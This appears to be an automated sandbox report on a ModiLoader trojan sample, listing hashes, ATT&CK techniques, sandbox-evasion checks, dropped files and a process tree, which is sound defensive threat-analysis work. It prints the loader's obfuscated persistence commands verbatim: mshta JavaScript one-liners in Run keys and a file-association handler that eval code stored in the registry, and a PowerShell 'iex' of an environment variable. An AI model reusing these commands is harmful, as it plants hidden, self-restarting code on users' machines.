modiloader | 62fbeb646293b7d55ec5f9f0d7ed43e1e498510349b46ca93388e8b2bb9dc948

Analysis

max time kernel
149s
max time network
150s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
13/09/2024, 19:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dec6c60c89ba5247d5e783a817a3b8ee_JaffaCakes118.exe
Size

577KB
MD5

dec6c60c89ba5247d5e783a817a3b8ee
SHA1

4b5bf5972de8298c82254313d3603ca7e57d0c7d
SHA256

62fbeb646293b7d55ec5f9f0d7ed43e1e498510349b46ca93388e8b2bb9dc948
SHA512

6808270489935e44d9fc299bf03075c716dbc7c7af1ee0939baef3c45c6b07aabf84e03906142c9de56154b1995aaeb53e0622c3bec37d0f59ca01835419126f
SSDEEP

12288:LeohY7kszv6ynzRtxvlX3UHZEylVVGYMvtTvxkgoV:LYTvnbcmyLV34rPQ

Score

10^/10

modiloader discovery evasion execution persistence trojan upx

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2256	2884	mshta.exe	31

Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions	regsvr32.exe

Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs

evasion

File and Directory Discovery

T1083

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened (read-only)	C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys	regsvr32.exe

ModiLoader Second Stage 52 IoCs

resource	yara_rule
behavioral1/memory/2220-10-0x0000000000400000-0x0000000000439000-memory.dmp	modiloader_stage2
behavioral1/memory/2220-7-0x0000000000400000-0x0000000000439000-memory.dmp	modiloader_stage2
behavioral1/memory/2220-6-0x0000000000400000-0x0000000000439000-memory.dmp	modiloader_stage2
behavioral1/memory/2220-5-0x0000000000400000-0x0000000000439000-memory.dmp	modiloader_stage2
behavioral1/memory/2220-14-0x0000000000400000-0x0000000000439000-memory.dmp	modiloader_stage2
behavioral1/memory/2220-28-0x0000000000400000-0x0000000000439000-memory.dmp	modiloader_stage2
behavioral1/memory/2220-30-0x0000000001F90000-0x0000000002064000-memory.dmp	modiloader_stage2
behavioral1/memory/2220-37-0x0000000001F90000-0x0000000002064000-memory.dmp	modiloader_stage2
behavioral1/memory/2220-39-0x0000000001F90000-0x0000000002064000-memory.dmp	modiloader_stage2
behavioral1/memory/2220-40-0x0000000001F90000-0x0000000002064000-memory.dmp	modiloader_stage2
behavioral1/memory/2220-38-0x0000000001F90000-0x0000000002064000-memory.dmp	modiloader_stage2
behavioral1/memory/2220-36-0x0000000001F90000-0x0000000002064000-memory.dmp	modiloader_stage2
behavioral1/memory/2220-34-0x0000000001F90000-0x0000000002064000-memory.dmp	modiloader_stage2
behavioral1/memory/2220-42-0x0000000001F90000-0x0000000002064000-memory.dmp	modiloader_stage2
behavioral1/memory/2220-45-0x0000000001F90000-0x0000000002064000-memory.dmp	modiloader_stage2
behavioral1/memory/2768-53-0x00000000061D0000-0x00000000062A4000-memory.dmp	modiloader_stage2
behavioral1/memory/2768-55-0x00000000061D0000-0x00000000062A4000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-57-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-54-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-77-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-74-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-97-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-90-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-89-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-88-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-86-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-85-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-80-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-79-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-78-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-76-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-75-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-73-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-71-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-70-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-68-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-66-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-65-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-96-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-63-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-72-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-69-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-67-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-64-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-62-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-61-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-60-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-59-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/1412-58-0x0000000000150000-0x000000000028E000-memory.dmp	modiloader_stage2
behavioral1/memory/572-103-0x00000000000D0000-0x000000000020E000-memory.dmp	modiloader_stage2
behavioral1/memory/572-104-0x00000000000D0000-0x000000000020E000-memory.dmp	modiloader_stage2
behavioral1/memory/2220-141-0x0000000001F90000-0x0000000002064000-memory.dmp	modiloader_stage2

Looks for VMWare Tools registry key 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools	regsvr32.exe

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x0009000000016cfe-29.dat	acprotect

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	regsvr32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	regsvr32.exe

Deletes itself 1 IoCs

pid	Process
1412	regsvr32.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\32bbfc.lnk	regsvr32.exe

Loads dropped DLL 1 IoCs

pid	Process
2220	dec6c60c89ba5247d5e783a817a3b8ee_JaffaCakes118.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0009000000016cfe-29.dat	upx
behavioral1/memory/2220-35-0x0000000071970000-0x000000007199E000-memory.dmp	upx
behavioral1/memory/2220-46-0x0000000071970000-0x000000007199E000-memory.dmp	upx
behavioral1/memory/2220-48-0x0000000071970000-0x000000007199E000-memory.dmp	upx
behavioral1/memory/2220-142-0x0000000071970000-0x000000007199E000-memory.dmp	upx

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:klZeHcJ5m=\"X\";E83r=new%20ActiveXObject(\"WScript.Shell\");q0JHbK0MTd=\"3RQdMh2J\";sCpX2=E83r.RegRead(\"HKCU\\\\software\\\\wboa\\\\mtepl\");G09xTUdtI=\"WIUful0vC\";eval(sCpX2);GbblB4Vzb=\"5R5zrxJI\";"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\f6d268\\461b3a.lnk\""	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:DAwzc63yL=\"HJOXL\";Fy1=new%20ActiveXObject(\"WScript.Shell\");ICbBaqs1A=\"iNnOrhVZk\";a04JJK=Fy1.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\wboa\\\\mtepl\");xElwp0Y=\"Mg09W\";eval(a04JJK);trnnAK0A=\"jZz\";"	regsvr32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2768	powershell.exe

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	regsvr32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	regsvr32.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2056 set thread context of 2220	2056	dec6c60c89ba5247d5e783a817a3b8ee_JaffaCakes118.exe	30
PID 2768 set thread context of 1412	2768	powershell.exe	36
PID 1412 set thread context of 572	1412	regsvr32.exe	37

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dec6c60c89ba5247d5e783a817a3b8ee_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dec6c60c89ba5247d5e783a817a3b8ee_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\International	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl	regsvr32.exe

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\e315b2\shell\open	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\e315b2\shell\open\command	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\e315b2\shell\open\command\ = "mshta \"javascript:HZGq4PuBt=\"nj\";D4N3=new ActiveXObject(\"WScript.Shell\");G8Yr2DXLd=\"N3P\";Yl7SP=D4N3.RegRead(\"HKCU\\\\software\\\\wboa\\\\mtepl\");iQ1UCUW9R=\"HNMHtI\";eval(Yl7SP);TR0Ha8AEj=\"E\";\""	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\.fd6a548	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\.fd6a548\ = "e315b2"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\e315b2	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\e315b2\shell	regsvr32.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2056	dec6c60c89ba5247d5e783a817a3b8ee_JaffaCakes118.exe
2768	powershell.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe
1412	regsvr32.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
2768	powershell.exe
1412	regsvr32.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2056	dec6c60c89ba5247d5e783a817a3b8ee_JaffaCakes118.exe
Token: SeDebugPrivilege	2768	powershell.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 2056 wrote to memory of 2220	2056	dec6c60c89ba5247d5e783a817a3b8ee_JaffaCakes118.exe	30
PID 2056 wrote to memory of 2220	2056	dec6c60c89ba5247d5e783a817a3b8ee_JaffaCakes118.exe	30
PID 2056 wrote to memory of 2220	2056	dec6c60c89ba5247d5e783a817a3b8ee_JaffaCakes118.exe	30
PID 2056 wrote to memory of 2220	2056	dec6c60c89ba5247d5e783a817a3b8ee_JaffaCakes118.exe	30
PID 2056 wrote to memory of 2220	2056	dec6c60c89ba5247d5e783a817a3b8ee_JaffaCakes118.exe	30
PID 2056 wrote to memory of 2220	2056	dec6c60c89ba5247d5e783a817a3b8ee_JaffaCakes118.exe	30
PID 2056 wrote to memory of 2220	2056	dec6c60c89ba5247d5e783a817a3b8ee_JaffaCakes118.exe	30
PID 2056 wrote to memory of 2220	2056	dec6c60c89ba5247d5e783a817a3b8ee_JaffaCakes118.exe	30
PID 2056 wrote to memory of 2220	2056	dec6c60c89ba5247d5e783a817a3b8ee_JaffaCakes118.exe	30
PID 2056 wrote to memory of 2220	2056	dec6c60c89ba5247d5e783a817a3b8ee_JaffaCakes118.exe	30
PID 2056 wrote to memory of 688	2056	dec6c60c89ba5247d5e783a817a3b8ee_JaffaCakes118.exe	10
PID 2056 wrote to memory of 1244	2056	dec6c60c89ba5247d5e783a817a3b8ee_JaffaCakes118.exe	21
PID 2056 wrote to memory of 1420	2056	dec6c60c89ba5247d5e783a817a3b8ee_JaffaCakes118.exe	23
PID 2056 wrote to memory of 2220	2056	dec6c60c89ba5247d5e783a817a3b8ee_JaffaCakes118.exe	30
PID 2256 wrote to memory of 2768	2256	mshta.exe	33
PID 2256 wrote to memory of 2768	2256	mshta.exe	33
PID 2256 wrote to memory of 2768	2256	mshta.exe	33
PID 2256 wrote to memory of 2768	2256	mshta.exe	33
PID 2768 wrote to memory of 1412	2768	powershell.exe	36
PID 2768 wrote to memory of 1412	2768	powershell.exe	36
PID 2768 wrote to memory of 1412	2768	powershell.exe	36
PID 2768 wrote to memory of 1412	2768	powershell.exe	36
PID 2768 wrote to memory of 1412	2768	powershell.exe	36
PID 2768 wrote to memory of 1412	2768	powershell.exe	36
PID 2768 wrote to memory of 1412	2768	powershell.exe	36
PID 2768 wrote to memory of 1412	2768	powershell.exe	36
PID 1412 wrote to memory of 572	1412	regsvr32.exe	37
PID 1412 wrote to memory of 572	1412	regsvr32.exe	37
PID 1412 wrote to memory of 572	1412	regsvr32.exe	37
PID 1412 wrote to memory of 572	1412	regsvr32.exe	37
PID 1412 wrote to memory of 572	1412	regsvr32.exe	37
PID 1412 wrote to memory of 572	1412	regsvr32.exe	37
PID 1412 wrote to memory of 572	1412	regsvr32.exe	37
PID 1412 wrote to memory of 572	1412	regsvr32.exe	37

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
1⤵
PID:688

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1244
- C:\Users\Admin\AppData\Local\Temp\dec6c60c89ba5247d5e783a817a3b8ee_JaffaCakes118.exe
  "C:\Users\Admin\AppData\Local\Temp\dec6c60c89ba5247d5e783a817a3b8ee_JaffaCakes118.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2056
- - C:\Users\Admin\AppData\Local\Temp\dec6c60c89ba5247d5e783a817a3b8ee_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\dec6c60c89ba5247d5e783a817a3b8ee_JaffaCakes118.exe"
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:2220

C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
1⤵
PID:1420

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" javascript:GLUpZl8ZX="3dJNp0b";G38v=new%20ActiveXObject("WScript.Shell");w3DCmJe="dSxBN";pLH0A=G38v.RegRead("HKLM\\software\\Wow6432Node\\uOAB0vWr\\PebmWkyceC");DtX9QWI0en="V";eval(pLH0A);ZyS3VMe7="tbIrg4U";
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2256
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:iqynf
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2768
- - C:\Windows\SysWOW64\regsvr32.exe
    regsvr32.exe
    3⤵
    - Looks for VirtualBox Guest Additions in registry
    - Looks for VirtualBox drivers on disk
    - Looks for VMWare Tools registry key
    - Checks BIOS information in registry
    - Deletes itself
    - Drops startup file
    - Adds Run key to start application
    - Maps connected drives based on registry
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:1412
  - - C:\Windows\SysWOW64\regsvr32.exe
      "C:\Windows\SysWOW64\regsvr32.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:572

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

File and Directory Discovery

T1083

Peripheral Device Discovery

T1120

Query Registry

T1012

Software Discovery

T1518

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\432fggqdd.txt

Filesize
4B

MD5
d2a27e83d429f0dcae6b937cf440aeb1

SHA1
8393e8e13cf2a84516f7146cc2f58dbc8f771a3b

SHA256
230ad27c6e6e27669363918994e83fc533cf8d5ab4ee57ea1855428b8c553a53

SHA512
bae70ceb7caf6402b80d11590c921a9024974e4f27e56b70836c38d2b96036ccaa8ccc82e8dd5a4262570626fb01c75fb1fcad6ca627a3c10c0b90025ad0653f

Download Submit
C:\Users\Admin\AppData\Local\Temp\4fggqdd.txt

Filesize
84B

MD5
7620ce4107508bfa4c6ee595b7ab6b1d

SHA1
1e383fe1fec18eec4481be7e6ea3d56288a36f01

SHA256
e4e86e98f3d50520f98ddd6d91e8425e6091ea15d7d1820967d5ccca50ff5daa

SHA512
0108da7c156716618e361d07d0e0a295862005101a4b7ddda9190d6749df611c08cf7c6c0ad052f1bc85512a82f289a8bbf15eb6517a622afcc3004d9e3461d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpA72B.tmp

Filesize
66KB

MD5
aaa698721f488b181bc0f0afc5da126a

SHA1
76536a73f16ffd643ea24f8725cebfff9d49852f

SHA256
e71ba7ce01d10e60a4feac7fc5e04f34756ba621c7d88583d0f96bd3b2655647

SHA512
67d8b05678fbdc1678515c341fa8c1e26f3d1b15f2cc390bb9b1a26589a346fd57697dd3366e72d46ab265570929f1be89b8aec81112a2a98194c5886c89261d

Download Submit
C:\Users\Admin\AppData\Local\f6d268\461b3a.lnk

Filesize
881B

MD5
d092304763ce9643fac8ec7e2d9d61c0

SHA1
554ef53842ad9c58cce69f2047a6605d9b6233f3

SHA256
458927bdd731bf58f461abed025924003612993f3034667c4d52e9aaed7e6187

SHA512
07d9ebb2b7ab8b22550920f78dec2a4c0040bc00e37f4d93c431836a3823b545858ecd77719321417a967acd4037dcb6a0222124107cc8318aed89d95e80fdc1

Download Submit
C:\Users\Admin\AppData\Local\f6d268\58ab7d.bat

Filesize
61B

MD5
6758656287999b3d42af11039bbf0999

SHA1
a5ea222fb793dd0baf99ec339339ac00362305d0

SHA256
18a3b9a8bd0e165cf35cc1196539f7ae63e534095d9c0f504ee925bf29960994

SHA512
9d00abe09b7bd80fe83cef1f49a099f93b7332cfe42ca599dab96d341ff060a918b231ab93959a9fd386a1f398f926f1ae25e631ca7615abfc6bb3245765b29a

Download Submit
C:\Users\Admin\AppData\Local\f6d268\692215.fd6a548

Filesize
42KB

MD5
ed39a95c10eb7746597155de2be772e1

SHA1
08398cf3770b0947bc849ed6b37ed121cd876873

SHA256
ae40276538b266e0b35233a5c2d9105ca7ab232b722510913ade39515754991f

SHA512
1efd4a0fca0b8de0ddcaa4d0dd73828df9647c07133dbe1d8331fb81237181b7b166f0229d6e2abfe34602fe5cc762227d0eece80a294922256052fc489fc315

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\32bbfc.lnk

Filesize
991B

MD5
2ec79527fe77e2795cba9fe7025a9b43

SHA1
1f83f5616a52802f9d1a4594a94b997f9b647ec7

SHA256
7a7388c8c8f599ae24bd97ff92f75b919ef899dd472585636811837d72947520

SHA512
aa8eed04e406dbf24193aba4aefce9fcbdfaf21ab6e956d11fb6e2c5cd18f23c66fbc87127e90549e255884ca0873afa7bb46f1390512a9c4c891b1725bff071

Download Submit
C:\Users\Admin\AppData\Roaming\f34832\9bfa9e.fd6a548

Filesize
34KB

MD5
56484583dbffd7c7e1d723f97277c95a

SHA1
63aec6fa579834b17267d43e3a33c1e89d7e0fb0

SHA256
0e4955caad68a3167da836988a75c37cd333ae83b915c48f4df5e6a69b263626

SHA512
956fe750e3c6148e0ca163847f8f13dd242f1b7dda04dd1b8d2c580454878bfb3238bec6529f56375896850799958f3656be7577970e91e208cdacf62015c41e

Download Submit
memory/572-104-0x00000000000D0000-0x000000000020E000-memory.dmp

Filesize
1.2MB

Download
memory/572-103-0x00000000000D0000-0x000000000020E000-memory.dmp

Filesize
1.2MB

Download
memory/688-16-0x0000000000130000-0x0000000000131000-memory.dmp

Filesize
4KB

Download
memory/1412-72-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-67-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-58-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-59-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-60-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-61-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-62-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-64-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-69-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-63-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-96-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-65-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-66-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-68-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-70-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-71-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-73-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-75-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-76-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-78-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-57-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-54-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-77-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-74-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-97-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-90-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-89-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-88-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-86-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-85-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-80-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/1412-79-0x0000000000150000-0x000000000028E000-memory.dmp

Filesize
1.2MB

Download
memory/2056-41-0x0000000074190000-0x000000007473B000-memory.dmp

Filesize
5.7MB

Download
memory/2056-1-0x0000000074190000-0x000000007473B000-memory.dmp

Filesize
5.7MB

Download
memory/2056-2-0x0000000074190000-0x000000007473B000-memory.dmp

Filesize
5.7MB

Download
memory/2056-0-0x0000000074191000-0x0000000074192000-memory.dmp

Filesize
4KB

Download
memory/2220-28-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
